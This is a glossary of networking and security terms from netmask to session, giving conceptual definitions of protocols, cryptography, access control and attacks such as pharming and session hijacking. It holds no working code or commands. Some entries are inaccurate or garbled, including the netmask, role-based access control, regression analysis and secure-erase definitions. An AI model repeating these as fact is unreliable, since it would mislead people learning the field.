A netmask is a string of 0’s and 1’s that screens out the network part of an IP address so that only the host computer part of the address remains. The binary 1’s at the beginning of the mask turn the network ID part of the IP address into 0’s. The binary 0’s that follow allow the host ID to remain. Two host values are always reserved: host part “0” is the network address and host part “255” is the broadcast address. These two are always assigned and cannot be used for hosts.
Network based IDS
Network-based intrusion detection systems (NIDS) are placed at a strategic point (or points) to monitor the traffic on the network. A NIDS analyses the traffic passing on the entire subnet and matches it against a library of known attacks. When an attack is identified, or abnormal behaviour is detected, an alert is sent to the administrator. OPNET and NetSim are commonly used tools for simulating network intrusion detection systems.
Network mapping
Network mapping is the study of the physical connectivity of networks. It is used to compile an electronic inventory of the systems and the services on a network. As networks have grown more complex, automated network mapping has become more popular.
Network taps
Network taps are hardware devices that provide access to the data flowing across a computer network. They allow a third party to monitor the traffic between two points in the network. A network tap has (at least) three ports: an A port, a B port, and a monitor port. Network taps are generally used for network intrusion detection systems, VoIP recording, network probes, RMON probes, packet sniffers, and other monitoring and collection devices and software that require access to a network segment.
Non printable character
A non-printable character is a character that has no printable symbol corresponding to its ASCII code. Examples are the linefeed (ASCII code 10 decimal), the carriage return (13 decimal), and the bell (7 decimal). On a PC, you can often enter non-printable characters by holding down the Alt key and typing the decimal value (e.g., Alt-007 gives you a bell). There are other character encoding schemes, but ASCII is the most prevalent.
Non repudiation
Non-repudiation refers to the ability of a system to prove that a specific user, and only that specific user, sent a message and that it hasn’t been modified. On the Internet, a digital signature is used not only to ensure that a message or document has been electronically signed by a person but also, since a digital signature can only be created by that one person, to ensure that the person cannot later deny having furnished the signature.
Null session
A null session is also known as an anonymous logon. It is a method that allows an anonymous user to retrieve information such as user names and shares over the network, or to connect without authentication. Null sessions are one of the most commonly used methods of network exploration employed by “hackers.” A null session connection allows you to connect to a remote machine without using a username or password; instead, you are given anonymous or guest access.
Octet
An octet is a unit of digital information that consists of eight bits. Octets are generally displayed using a variety of representations, for example in the hexadecimal, decimal, or octal number systems. The binary value with all 8 bits set (turned on) is 11111111, equal to the hexadecimal value FF, the decimal value 255, and the octal value 377. One octet can represent decimal values ranging from 0 to 255.
One way encryption
One-way encryption, or a one-way hash function, is designed so that it is hard to reverse the process, that is, to find a string that hashes to a given value (hence the name one-way). A good hash function also makes it hard to find two strings that produce the same hash value.
One way function
A one-way function is any function that is easy to compute on every input but hard to invert given the image of a random input.
Open shortest path first OSPF
Open Shortest Path First (OSPF) is a routing protocol for IP networks that uses a link-state routing algorithm. It falls into the group of interior routing protocols, operating within a single autonomous system (AS). OSPF is the most commonly used interior gateway protocol (IGP) in large enterprise networks.
OSI layers
The Open System Interconnection (OSI) model defines a networking framework for implementing protocols in seven layers. Control is passed from one layer to the next, starting at the application layer in one station, proceeding to the bottom layer, over the channel to the next station, and back up the hierarchy. The OSI model divides the task of internetworking into what is referred to as a vertical stack consisting of the following layers.
1. Physical (layer 1) – conveys the bit stream (electrical impulse, light, or radio signal) through the network at the electrical and mechanical level. Fast Ethernet, RS-232, and ATM are protocols with physical layer components.
2. Data link (layer 2) – at this layer, data packets are encoded and decoded into bits. The data link layer is divided into two sub-layers: the media access control (MAC) layer and the logical link control (LLC) layer.
3. Network (layer 3) – provides switching and routing technologies, creating logical paths, known as virtual circuits, for transmitting data from node to node.
4. Transport (layer 4) – provides transparent transfer of data between end systems, or hosts, and is responsible for end-to-end error recovery and flow control. It ensures complete data transfer.
5. Session (layer 5) – establishes, manages and terminates connections between applications.
6. Presentation (layer 6) – provides independence from differences in data representation (e.g., encryption) by translating from application to network format, and vice versa.
7. Application (layer 7) – supports application and end-user processes. This layer provides application services for file transfers, e-mail, and other network software services. Telnet and FTP are applications that exist entirely at the application level.
OSI
OSI stands for Open System Interconnection and is an ISO standard for worldwide communications. OSI defines a networking framework for implementing protocols in seven layers, describing the functions that take place at each end of a communication. Although OSI is not always strictly adhered to in terms of keeping related functions together in a well-defined layer, many products involved in telecommunication attempt to describe themselves in relation to the OSI model.
Overload
Overload is defined as the limitation of system operation by an excessive burden on the performance capabilities of a system component.
Packet switched network PSN
A packet switched network (PSN) is a computer communications network that groups and sends data in the form of small packets. It enables sending data packets between a source and a destination node over a channel that is shared between multiple users and/or applications. A packet switched network is also known as a connectionless network, as it does not create a permanent connection between a source and destination node.
Packet
A packet is a unit of data that is routed between an origin and a destination on the Internet or any other packet-switched network. When any file (such as an e-mail message, HTML file, Graphics Interchange Format file, or Uniform Resource Locator request) is sent from one place to another, the Transmission Control Protocol (TCP) layer of TCP/IP divides the file into smaller chunks suitable for routing.
Partitioning
Partitioning is the division of a computer hard disk or other secondary storage into one or more regions. Many computers have hard disk drives with only a single partition, but others have multiple partitions so that an OS can manage information in each region separately. Each partition then appears in the OS as a distinct logical disk that uses part of the actual disk.
Password authentication protocol PAP
Password Authentication Protocol (PAP) is the most basic form of authentication, in which a user’s name and password are transmitted over a network and compared to a table of name-password pairs. The basic authentication feature built into the HTTP protocol uses PAP.
Password cracking
Password cracking is the process of trying to guess or crack passwords to gain access to a computer system or network. Crackers generally use a variety of tools, scripts, or software to crack a system password. Password cracks work by comparing every encrypted dictionary word against the entries in the system password file until a match is found.
Password sniffing
Password sniffing is a technique used to gain knowledge of passwords by monitoring traffic on a network and pulling out the relevant information. Several software tools are available for automatic password sniffing.
Patch
A patch is a piece of software designed and created to update a computer program or its supporting data, to fix or improve it. This includes fixing security vulnerabilities and other bugs, usually called bug fixes. Each patch is created to improve the usability and/or performance of the system or application.
Patching
Patching is the process of updating software to a different version. It is also referred to as updating the software to the latest version available and is key in removing bugs of the previous version.
Payload
A payload is the actual application data a packet contains. It is the part of the transmitted data that is the fundamental purpose of the transmission. In summary, payload refers to the actual intended message in a transmission.
Penetration testing
Penetration testing, also called pen testing, is the practice of testing a computer system, network or web application to find vulnerabilities that an attacker could exploit.
Penetration
Penetration is defined as gaining unauthorised logical access to sensitive data by evading a system’s protections.
Permutation
Permutation is a technique that keeps the same letters but changes their positions within a text to scramble the message.
Personal firewall
Personal firewalls are firewalls installed and run on individual computers. A personal firewall is an application that controls network traffic to and from a computer, permitting or denying communications based on a security policy. Typically it works as an application layer firewall.
Pharming
Pharming is defined as a cyber attack intended to redirect a website’s traffic to a masquerading website, which may be a fake one. Pharming is achieved by corrupting a DNS server on the Internet and steering a URL to the masked website’s IP address. Users generally reach a website by its URL rather than by its real IP address, so by substituting the pointers on a DNS server the URL can be redirected to send traffic to the IP address of the pseudo website. The transactions can be imitated and information like login credentials can be gathered at the pseudo site. Using the information gathered, the attacker can access the real site and conduct transactions using the credentials of a valid user.
Phishing
Phishing is an attempt to acquire sensitive information such as usernames, passwords, and credit card details by impersonating a trustworthy entity. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.
Ping of death
A ping of death is an attack that involves sending a malformed or otherwise malicious ping to a computer with the intent of overflowing the input buffers of the destination machine and causing it to crash. A ping of death is fragmented into groups of 8 octets before transmission.
Ping scan
A ping scan looks for machines that are responding to ICMP echo requests.
Ping sweep
A ping sweep is a technique used to establish which IP addresses in a range map to live hosts. Well-known tools with ping sweep capability include nmap for Unix systems and the Pinger software from Rhino9 for Windows NT. There are many other tools with this capability, including hping, Simple Nomad’s icmpenum, SolarWinds Ping Sweep, and Foundstone’s SuperScan. Pings can be detected by protocol loggers like ippl.
Plaintext
Plaintext is the most portable format and is supported by almost every application. In cryptography, plaintext refers to any message that is not encrypted.
Point to point protocol PPP
Point-to-Point Protocol (PPP) is a communication protocol between two computers that uses a serial interface, typically a personal computer connected by a phone line to a server. PPP uses the Internet Protocol (IP) and is sometimes considered a member of the TCP/IP suite of protocols.
Point to point tunneling protocol PPTP
The Point-to-Point Tunneling Protocol (PPTP) is an approach used to implement virtual private networks (VPNs). PPTP uses a control channel over TCP and a GRE tunnel to encapsulate PPP packets.
Poison reverse
Poison reverse is a method in which a gateway node informs its neighbouring gateways that one of the gateways is no longer connected. The notifying gateway sets the number of hops to the unconnected gateway to a number that indicates “infinite”, in effect advertising that the routes through it are not reachable.
Polyinstantiation
Polyinstantiation is the ability of a database to maintain multiple records with the same key. It is used to prevent inference attacks. It may also indicate, as in the case of database polyinstantiation, that two different instances have the same name (identifier, primary key).
Polymorphism
Polymorphism is the process by which malicious software changes its underlying code to avoid detection. In programming, a polymorphic type is one whose operations can also be applied to values of some other type, or types.
Port scan
A port scan is a sequence of messages sent by an attacker attempting to break into a computer. Port scanning gives the attacker an idea of where to probe for weaknesses. A port scan consists of sending a message to each port, one at a time.
Port
A port is an end point of communication in an operating system. It is identified for each address and protocol by a 16-bit number, commonly known as the port number.
Possession
Possession is the holding, control, and ability to use information.
Post office protocol version 3 POP3
Post Office Protocol, version 3 (POP3) is an Internet standard protocol through which a client workstation can access a mailbox on a server host to retrieve mail messages that the server has received and is holding for the client.
Practical extraction and reporting language Perl
Perl is a family of high-level, general-purpose, dynamic programming languages, including Perl 5 and Perl 6. Perl was originally developed by Larry Wall in 1987 as a general-purpose Unix scripting language.
Preamble
A preamble is a signal used in communications to synchronise the transmission timing between two or more systems. A preamble defines a specific series of transmission pulses that is understood by the communicating systems. This ensures that systems receiving the information correctly interpret when the data transmission starts. The actual pulses used as a preamble vary depending on the network communication technology in use.
Pretty good privacy PGP
Pretty Good Privacy (PGP) is a trademarked data encryption and decryption program. The program provides cryptographic privacy and authentication for data communication. It was created by Phil Zimmermann in 1991. PGP is generally used for encrypting and decrypting texts, e-mails, files, directories, and whole disk partitions, and to increase the security of e-mail communications.
Private addressing
IANA has set aside three address ranges for use by private or non-Internet-connected networks. This is referred to as private address space and is defined in RFC 1918. The reserved address blocks are the 10/8 prefix, the 172.16/12 prefix and the 192.168/16 prefix.
program infector
A program infector is a piece of malware (or virus) that attaches itself to existing program files. Once the original infected program is run the virus transfers to the computer memory and may replicate itself further, spreading the infection. This type of virus can be spread beyond one’s system as soon as the infected file or program is passed to another computer.
Program policy
A program policy is a high-level policy that sets the overall tone of an organisation’s security approach.
Promiscuous mode
Promiscuous mode allows a network device to intercept and read, in its entirety, each network packet that reaches it. This is used by network administrators to diagnose network problems, but also by unsavoury characters who are trying to eavesdrop on network traffic (which might contain passwords or other information).
Proprietary information
Proprietary information is information unique to a company and central to its ability to compete, such as customer lists, technical data, product costs, and trade secrets.
Protocol stacks osi
Protocol stacks are a set of network protocol layers that work together.
A protocol is a special set of rules that end points in a telecommunication connection use when they communicate. Protocols specify interactions between the communicating entities. Protocols exist at several levels in a telecommunication connection.
Proxy server
A proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers. A proxy server is associated with or part of a gateway server that separates the enterprise network from the outside network and a firewall server that protects the enterprise network from outside intrusion. Most proxies are web proxies, facilitating access to content on the world wide web and providing anonymity.
Public key encryption
Public key encryption is also known as asymmetric cryptography. Public key encryption is a cryptographic system that uses two keys, a public key known to everyone and a private or secret key known only to the recipient of the message.
Public key forward secrecy pfs
Public-key forward secrecy (pfs) is a key agreement protocol based on asymmetric cryptography. It ensures that a session key derived from a set of long-term public and private keys will not be compromised if one of the private keys is compromised in the future.
Public key infrastructure pki
A public key infrastructure (pki) is a set of hardware, software, people, policies, and procedures needed to create, manage, distribute, use, store, and revoke digital certificates and manage public-key encryption. It enables users of an unsecured network to securely exchange data and money through the use of a public and a private cryptographic key pair that is obtained through a trusted authority. The public key infrastructure provides for a digital certificate that can identify an individual or an organization and directory services that can store and, when necessary, revoke the certificates.
Public key
A public key is the publicly-disclosed component of a pair of cryptographic keys used for asymmetric cryptography.
A qaz is a network worm.
Race condition
Race condition is also known as race hazard. Race condition is the behavior of an electronic, software, or other system where the output is dependent on the sequence or timing of other uncontrollable events. This becomes a bug when events don’t happen in the order the programmer planned. Race conditions can occur in electronics systems, especially logic circuits, and in computer software, especially multithreaded or distributed programs.
Radiation monitoring
Radiation monitoring is the process of receiving images, data, or audio from an unprotected source by snooping on its radiated signals.
Reconnaissance is the phase of an attack in which an attacker locates new systems, maps out networks, and probes for specific vulnerabilities in a system or network. It is used to obtain information, by either visual observation or other detection methods, about the activities and resources of the target.
Reflexive acls cisco
Reflexive access lists are an important part of securing a network against hackers and are generally included in a firewall defence. Reflexive access lists provide a level of security against spoofing and denial-of-service attacks. Reflexive ACLs for Cisco routers are a step towards making the router act like a stateful firewall: the router makes filtering decisions based on whether connections are part of established traffic or not.
Registry is a system-defined database where applications and system components store and retrieve configuration data. Applications use the registry api to retrieve, modify, or delete registry data.
Regression analysis
Regression analysis is the use of scripted tests that exercise software with the full range of inputs it is expected to handle. Typically, developers create a set of regression tests that are executed before a new version of the software is released.
Request for comment rfc
A request for comments (rfc) is a type of publication from the internet engineering task force (ietf) and the internet society. An rfc is authored by engineers and computer scientists in the form of a memorandum describing methods, behaviors, research, or innovations applicable to the working of the internet and internet-connected systems. Rfc started in 1969, when the internet was the arpanet.
Resource exhaustion
Resource exhaustion is a kind of attack where the attacker or hacker ties up finite resources on a system, making them unavailable to others.
A response is information that is sent in response to some stimulus.
Reverse address resolution protocol rarp
Reverse address resolution protocol (rarp) is a protocol where a physical machine in a local area network (lan) can request to learn its ip address from a gateway server’s address resolution protocol (arp) table or cache. When a new machine is set up, its rarp client program requests from the rarp server on the router to be sent its ip address.
Reverse engineering
Reverse engineering, also known as "back engineering", is the process of extracting design information or any other kind of sensitive information by disassembling and analyzing the design of a system component.
Reverse lookup
The reverse lookup is used to locate the hostname that corresponds to a particular ip address. Reverse lookup uses an ip (internet protocol) address to find a domain name.
Reverse proxy
A reverse proxy is a device or service that is placed between a client and a server in a network. All incoming HTTP requests are received by the proxy, which forwards them to the back-end web servers and then returns the content to the end user.
Risk assessment
Risk assessment is a systematic process to analyze and identify any possible threats or risks that may leave sensitive information vulnerable to attacks. It also employs methods to calculate the risk impact and eliminate such threats.
Risk averse
Risk averse means avoiding risks even if this leads to the loss of opportunity. For example, choosing a (more expensive) phone call over sending an email, in order to avoid the risks associated with email, may be considered "risk averse".
Risk is the probability of a system or network attack. Risk is the potential of losing valuable and sensitive information.
Rivest shamir adleman rsa
Rivest-shamir-adleman (rsa) is one of the first practical public-key cryptosystems and is widely used for secure data transmission. Rsa is an algorithm for asymmetric cryptography, invented in 1977 by ron rivest, adi shamir, and leonard adleman. This is based on the practical difficulty of factoring the product of two large prime numbers, the factoring problem.
Role based access control
Role based access control (rbac) assigns users to roles based on their organizational functions and determines authorization based on those roles. It is used by enterprises with more than 500 employees, and can implement mandatory access control (mac) or discretionary access control (dac).
Root is the user name or account that by default has access to all commands and files on a linux or other unix-like operating system. It is also referred to as the root account, root user and the super user.
A rootkit is a type of malicious software that is activated each time the system boots up. Rootkits are difficult to detect as they are activated before your system’s operating system has completely booted up.
A router is a device that forwards or transfers data packets across networks. A router is connected to at least two networks, commonly two lans or wans or a lan and its isp’s network. Routers are located at gateways, the places where two or more networks connect.
Routing information protocol rip
The routing information protocol (rip) defines a manner for routers to share information on how to route traffic among various networks. Rip is classified by the internet engineering task force (ietf) as an interior gateway protocol (igp), one of several protocols for routers moving traffic around within a larger autonomous system network.
Routing loop
A routing loop is where two or more poorly configured routers repeatedly exchange the same data packet over and over. In case of distance vector protocols, the fact that these protocols route by rumor and have a slow convergence time can cause routing loops.
Rpc scans
Rpc scans determine which rpc services are running on a machine.
Rule set based access control rsbac
Rule set based access control (rsbac) targets actions based on rules for entities operating on objects. Rsbac is an open source access control framework for current linux kernels, which has been in stable production use since january 2000.
Scoping guidance
Scoping guidance is a part of tailoring guidance providing organizations with specific policy/regulatory-related, technology-related, system component allocation-related, operational/environmental-related, physical infrastructure-related, public access-related, scalability-related, common control-related, and security objective-related considerations on the applicability and implementation of individual security controls in the security control baseline. Scoping guidance is also specific factors related to technology, infrastructure, public access, scalability, common security controls, and risk that can be considered by organizations in the applicability and implementation of individual security controls in the security control baseline.
Safeguarding statement
A safeguarding statement is a statement affixed to a computer output or printout that states the highest classification being processed at the time the product was produced and requires control of the product, at that level, until determination of the true classification by an authorized individual. Synonymous with banners.
Safeguards are protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.
Safety is defined as the requirement to ensure that the individuals involved with an organization, including employees, customers, and visitors, are safeguarded from any kind of malicious act or attack.
Salt is a non-secret value that is used in a cryptographic process, usually to ensure that the results of computations for one instance cannot be reused by an attacker.
Sandboxing is a method of isolating application modules into distinct fault domains enforced by software. Sandboxing is a technique which allows untrusted programs written in an unsafe language, such as C, to be executed safely within the single virtual address space of an application. Untrusted machine-interpretable code modules are transformed so that all memory accesses are confined to code and data segments within their fault domain. Access to system resources can also be controlled through a unique identifier associated with each domain. Sandboxing also refers to a restricted, controlled execution environment that prevents potentially malicious software, such as mobile code, from accessing any system resources except those for which the software is authorized.
Sanitization is the process of removing information from media such that information recovery is not possible. It includes removing all labels, markings, and activity logs. More generally, sanitization refers to the actions taken to render data written on media unrecoverable by both ordinary and, for some forms of sanitization, extraordinary means.
S-box
An S-box is a nonlinear substitution table used in several byte substitution transformations and in the key expansion routine to perform a one-for-one substitution of a byte value.
Scanning is sending packets or requests to another system to gain information to be used in a subsequent attack.
Scatternet is a chain of piconets created by allowing one or more bluetooth devices to each be a slave in one piconet and act as the master for another piconet simultaneously. A scatternet allows several devices to be networked over an extended distance.
Scavenging is the process of searching through data residue in a system or a network to gain unauthorised knowledge of sensitive information.
Secret key symmetric cryptographic algorithm
Secret key (symmetric) cryptographic algorithm is a cryptographic algorithm that uses a single secret key for both encryption and decryption. A cryptographic algorithm that uses a single key (i.e., a secret key) for both encryption and decryption.
Secret key
A secret key is a cryptographic key that is used with a secret-key (symmetric) cryptographic algorithm, is uniquely associated with one or more entities, and is not made public. A secret key must be protected from unauthorized disclosure in order to protect the data encrypted with the key. The use of the term "secret" in this context does not imply a classification level; rather, it implies the need to protect the key from disclosure or substitution.
Secret seed
A secret seed is a secret value used to initialize a pseudorandom number generator.
Secure communication protocol
Secure communication protocol is a communication protocol that provides the appropriate confidentiality, authentication, and content-integrity protection.
Secure communications
Secure communications are telecommunications deriving security through use of nsa-approved products and/or protected distribution systems. Configuring and operating dns servers so that the security goals of data integrity and source authentication are achieved and maintained.
Secure electronic transactions set
A secure electronic transaction (SET) is a communications protocol standard for securing credit card transactions over insecure networks. SET ensures that all parties (customer, merchant, and bank) are authenticated using digital signatures, that encryption protects the message and provides integrity, and that credit card transactions online receive end-to-end security.
Secure erase
Secure erase is an overwrite technology that uses a firmware-based process to overwrite a hard drive. It is a drive command defined in the ANSI ATA and SCSI disk drive interface specifications, which runs inside the drive hardware. It completes in about 1/8 the time of 5220 block erasure.
Secure hash algorithm sha
Secure hash algorithm (SHA) is a hash algorithm with the property that it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest.
Secure hash standard
The secure hash standard specifies secure hash algorithms (SHA-1, SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224 and SHA-512/256) for computing a condensed representation of electronic data (a message). When a message of any length less than 2^64 bits (for SHA-1, SHA-224 and SHA-256) or less than 2^128 bits (for SHA-384, SHA-512, SHA-512/224 and SHA-512/256) is input to a hash algorithm, the result is an output called a message digest. The message digests range in length from 160 to 512 bits, depending on the algorithm. Secure hash algorithms are typically used with other cryptographic algorithms, such as digital signature algorithms and keyed-hash message authentication codes, or in the generation of random numbers (bits). The hash algorithms specified in this standard are called secure because, for a given algorithm, it is computationally infeasible 1) to find a message that corresponds to a given message digest, or 2) to find two different messages that produce the same message digest. Any change to a message will, with a very high probability, result in a different message digest. This will result in a verification failure when the secure hash algorithm is used with a digital signature algorithm or a keyed-hash message authentication algorithm. In addition, a secure hash standard is a specification for a secure hash algorithm that can generate a condensed message representation called a message digest.
Secure shell ssh
A secure shell (ssh) is also known as a secure socket shell. Ssh is a unix-based command interface and protocol used to log into another computer over a network, to execute commands in a remote machine, and to move files from one machine to another.
Secure sockets layer ssl
A secure sockets layer (ssl) is the standard security technology for establishing an encrypted link between a web server and a browser. Ssl was developed by netscape for transmitting private documents via the internet.
Secure state
Secure state is a condition in which no subject can access any object in an unauthorized manner.
Secure subsystem
A secure subsystem is a subsystem containing its own implementation of the reference monitor concept for those resources it controls. A secure subsystem must depend on other controls and the base operating system for the control of subjects and the more primitive system objects.
Security assertion markup language saml
Security assertion markup language (saml) is an xml-based security specification developed by the organization for the advancement of structured information standards (oasis) for exchanging authentication (and authorization) information between trusted entities over the internet. A framework for exchanging authentication and authorization information. Security typically involves checking the credentials presented by a party for authentication and authorization. Saml standardizes the representation of these credentials in an xml format called “assertions,” enhancing the interoperability between disparate applications. A protocol consisting of xml-based request and response message formats for exchanging security information, expressed in the form of assertions about subjects, between online business partners.
Security association
A security association is a relationship established between two or more entities to enable them to protect data they exchange.
Security attribute
A security attribute is a security-related quality of an object. Security attributes may be represented as hierarchical levels, bits in a bit map, or numbers. Compartments, caveats, and release markings are examples of security attributes. A security attribute is also an abstraction representing the basic properties or characteristics of an entity with respect to safeguarding information; typically associated with internal data structures (e.g., records, buffers, files) within the information system which are used to enable the implementation of access control and flow control policies; reflect special dissemination, handling, or distribution instructions; or support other aspects of the information security policy.
Security authorization boundary
A security authorization boundary is an information security area that includes a grouping of tools, technologies, and data.
Security banner
A security banner is a banner at the top or bottom of a computer screen that states the overall classification of the system in large, bold type. A security banner can also refer to the opening screen that informs users of the security implications of accessing a computer resource.
Security categorization
Security categorization is the process of determining the security category for information or an information system. Security categorization methodologies are described in CNSS Instruction 1253 for national security systems and in FIPS 199 for other than national security systems.
Security category
Security category is the characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, or individuals. It is also the characterization of information or an information system based on an assessment of the potential impact that a loss of confidentiality, integrity, or availability of such information or information system would have on organizational operations, organizational assets, individuals, other organizations, and the nation.
Security concept operations
Security concept of operations is a security-focused description of an information system, its operational policies, classes of users, interactions between the system and its users, and the system’s contribution to the operational mission.
Security content automation protocol scap
Security content automation protocol (scap) is a method for using specific standardized testing methods to enable automated vulnerability management, measurement, and policy compliance evaluation against a standardized set of security requirements.
Security control assessment
Security control assessment is the testing and/or evaluation of the management, operational, and technical security controls in an information system to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system. Security control assessment is the testing and/or evaluation of the management, operational, and technical security controls to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system and/or enterprise.
Security control assessor
A security control assessor is the individual, group, or organization responsible for conducting a security control assessment.
Security control baseline
A security control baseline is the set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system. One of the sets of minimum security controls defined for federal information systems in nist special publication 800-53 and cnss instruction 1253.
Security control effectiveness
Security control effectiveness is the measure of correctness of implementation (i.e., how consistently the control implementation complies with the security plan) and how well the security plan meets organizational needs in accordance with current risk tolerance.
Security control enhancements
Security control enhancements are statements of security capability to 1) build in additional, but related, functionality to a basic control; and/or 2) increase the strength of a basic control. Statements of security capability to: (i) build in additional, but related, functionality to a security control; and/or (ii) increase the strength of the control.
Security control inheritance
Security control inheritance is a situation in which an information system or application receives protection from security controls (or portions of security controls) that are developed, implemented, assessed, authorized, and monitored by entities other than those responsible for the system or application; entities either internal or external to the organization where the system or application resides. See common control.
Security controls baseline
Security controls baseline is the set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.
Security controls
Security controls are the management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information.
Security domain
A security domain is a set of subjects, their information objects, and a common security policy; it is also a collection of entities to which applies a single security policy executed by a single authority. A domain that implements a security policy and is administered by a single authority.
Security engineering
Security engineering is an interdisciplinary approach and means to enable the realization of secure systems. It focuses on defining customer needs, security protection requirements, and required functionality early in the systems development life cycle, documenting requirements, and then proceeding with design, synthesis, and system validation while considering the complete problem.
Security fault analysis sfa
Security fault analysis is an assessment, usually performed on information system hardware, to determine the security properties of a device when hardware fault is encountered.
Security features user's guide
A security features user's guide (SFUG) is a guide or manual explaining how the security mechanisms in a specific system work.
Security filter
Security filter is a secure subsystem of an information system that enforces security policy on the data passing through it.
Security functions
Security functions are the hardware, software, and/or firmware of the information system responsible for enforcing the system security policy and supporting the isolation of code and data on which the protection is based.
Security goals
The five security goals are confidentiality, availability, integrity, accountability, and assurance.
Security impact analysis
Security impact analysis is the analysis conducted by an organizational official to determine the extent to which changes to the information system have affected the security state of the system.
Security information event management siem tool
Security information and event management (siem) tool is an application that provides the ability to gather security data from information system components and present that data as actionable information via a single interface.
Security inspection
A security inspection is the examination of an information system to determine compliance with security policy, procedures, and practices.
Security kernel
A security kernel is the hardware, firmware, and software elements of a trusted computing base implementing the reference monitor concept. A security kernel must mediate all accesses, be protected from modification, and be verifiable as correct.
Security label
A security label is a marking bound to a resource (which may be a data unit) that names or designates the security attributes of that resource. Information that represents or designates the value of one or more security relevant-attributes (e.g., classification) of a system resource.
Security level
A security level is a hierarchical indicator of the degree of sensitivity to a certain threat. It implies, according to the security policy being enforced, a specific level of protection.
Security management dashboard
A security management dashboard is a tool that consolidates and communicates information relevant to the organizational security posture in near real-time to security management stakeholders.
Security markings
Security markings are human-readable indicators applied to a document, storage media, or hardware component to designate security classification, categorization, and/or handling restrictions applicable to the information contained therein. For intelligence information, security markings could include compartment and sub-compartment indicators and handling restrictions.
Security mechanism
A security mechanism is a device designed to provide one or more security services usually rated in terms of strength of service and assurance of the design.
Security net control station
A security net control station is a management system overseeing and controlling implementation of network security policy.
Security objective
A security objective pertains to confidentiality, integrity, or availability.
Security perimeter
A security perimeter is a physical or logical boundary that is defined for a system, domain, or enclave, within which a specified security policy or security architecture is applied.
Security plan
A security plan is a formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements.
Security policy
Security policy is a set of rules and practices that specify how a system or organization delivers security services to protect sensitive and critical information.
Security posture
The security status of an enterprise’s networks, information, and systems based on resources (e.g., people, hardware, software, policies) and capabilities in place to manage the defense of the enterprise and to react as the situation changes.
Security program plan
A security program plan is a formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management security controls and common security controls in place or planned for meeting those requirements.
Security range
A security range is the highest and lowest security levels that are permitted in or on an information system, system component, subsystem, or network.
Security relevant change
A security relevant change is any change to a system’s configuration, environment, information content, functionality, or users which has the potential to change the risk imposed upon its continued operations.
Security relevant event
A security relevant event is an occurrence (e.g., an auditable event or flag) considered to have potential security implications to the system or its environment that may require further action (noting, investigating, or reacting).
Security relevant information
Security relevant information is any information within the information system that can potentially impact the operation of security functions in a manner that could result in failure to enforce the system security policy or maintain isolation of code and data.
Security requirements baseline
Security requirements baseline is the description of the minimum requirements necessary for an information system to maintain an acceptable level of risk.
Security requirements traceability matrix srtm
A security requirements traceability matrix (srtm) is a matrix that captures all security requirements linked to potential risks and addresses all applicable c&a requirements. It is, therefore, a correlation statement of a system’s security features and compliance methods for each security requirement.
Security requirements
Security requirements are requirements levied on an information system that are derived from applicable laws, executive orders, directives, policies, standards, instructions, regulations, or procedures, or organizational mission/business case needs to ensure the confidentiality, integrity, and availability of the information being processed, stored, or transmitted.
Security safeguards
Security safeguards are protective measures and controls prescribed to meet the security requirements specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices.
Security service
A security service is a capability that supports one or more of the security goals or requirements (confidentiality, integrity, availability). Examples of security services are key management, access control, and authentication.
Security specification
Security specification is the detailed description of the safeguards required to protect an information system.
Security strength
Security strength is a measure of the computational complexity associated with recovering certain secret and/or security-critical information concerning a given cryptographic algorithm from known data (e.g. Plaintext/ciphertext pairs for a given encryption algorithm). It is also a number associated with the amount of work (that is, the number of operations) that is required to break a cryptographic algorithm or system. Sometimes referred to as a security level.
Security tag
A security tag is an information unit containing a representation of certain security related information (e.g., a restrictive attribute bitmap).
Security target
A security target is a common criteria specification that represents a set of security requirements to be used as the basis of an evaluation of an identified target of evaluation (toe).
Security test evaluation ste
A security test and evaluation is an examination and analysis of the safeguards required to protect an information system, as they have been applied in an operational environment, to determine the security posture of that system.
Security testing
Security testing is the process to determine that an information system protects data and maintains functionality as intended.
Security
Security is a condition that results from the establishment and maintenance of protective measures that enable an enterprise to perform its mission or critical functions despite risks posed by threats to its use of information systems. Protective measures may involve a combination of deterrence, avoidance, prevention, detection, recovery, and correction that should form part of the enterprise’s risk management approach.
Seed key
A seed key is an initial key used to start an updating or key generation process.
Segment
A segment is the protocol data unit of tcp: the tcp header plus the payload that tcp hands down to ip for delivery. On an ethernet lan, a segment is also a portion of the network separated from the rest by a bridge or switch; dividing an ethernet into multiple segments is one of the most common ways of increasing the bandwidth available on the lan.
Sensitive information
Sensitive information is data that must be protected from unauthorised access to safeguard the privacy or security of an individual, organisation, or nation. Information sensitivity is the control of access to information or knowledge that might result in loss of an advantage or level of security, if disclosed to others.
Separation of duties
Separation of duties (sod) is also known as “segregation of duties”. It is based on the principle of splitting privileges among multiple individuals or systems.
Server
A server is a computer entity or a machine that waits for requests from other machines or software (clients) and responds to them. The purpose of a server is to share data or hardware and software resources among clients.
Session hijacking
Session hijacking is also known as cookie hijacking. It is the exploitation of a valid session, typically by stealing or guessing the session identifier (such as a session cookie or token), to gain unauthorised access to sensitive information or services in a computer system or network. Session identifiers sent over unencrypted channels, identifiers that are predictable, and identifiers that are not rotated after login are the usual enablers.
Session key
A session key is a key that is temporary or is used for a relatively short period of time. It is an encryption and decryption key that is randomly generated to ensure the security of a communications session between a user and another computer or between two computers. These keys are sometimes called symmetric keys, because the same key is used for both encryption and decryption.
Session
